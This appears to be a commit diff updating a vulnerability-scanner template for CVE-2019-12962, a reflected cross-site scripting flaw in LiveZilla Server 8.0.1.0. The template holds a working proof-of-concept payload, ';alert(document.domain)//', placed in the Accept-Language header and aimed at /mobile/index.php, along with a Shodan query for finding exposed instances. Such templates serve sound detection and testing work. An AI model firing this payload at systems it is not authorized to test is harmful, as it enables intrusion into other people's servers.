Update CVE-2019-12962.yaml
parent
a7a30a3ddc
commit
4798c1a14c
|
@ -1,33 +1,38 @@
|
|||
id: CVE-2019-12962
|
||||
|
||||
info:
|
||||
name: LiveZilla Server 8.0.1.0 XSS
|
||||
name: LiveZilla Server 8.0.1.0 - Cross Site Scripting
|
||||
author: Clment Cruchet
|
||||
severity: medium
|
||||
description: LiveZilla Server 8.0.1.0 - Accept-Language Reflected XSS
|
||||
reference: https://www.exploit-db.com/exploits/49669
|
||||
description: |
|
||||
LiveZilla Server 8.0.1.0 - Accept-Language Reflected XSS
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/49669
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2019-12962
|
||||
metadata:
|
||||
verified-by: dhiyaneshdk
|
||||
shodan-query: http.html:LiveZilla
|
||||
tags: cve,cve2019,livezilla,xss
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
headers:
|
||||
Accept-Language: ';alert(document.domain)//
|
||||
path:
|
||||
- '{{BaseURL}}/mobile/index.php'
|
||||
|
||||
headers:
|
||||
Accept-Language: ';alert(document.domain)//'
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "alert(document.domain)//"
|
||||
part: body
|
||||
words:
|
||||
- "var detectedLanguage = ';alert(document.domain)//';"
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "text/html"
|
||||
part: header
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
Loading…
Reference in New Issue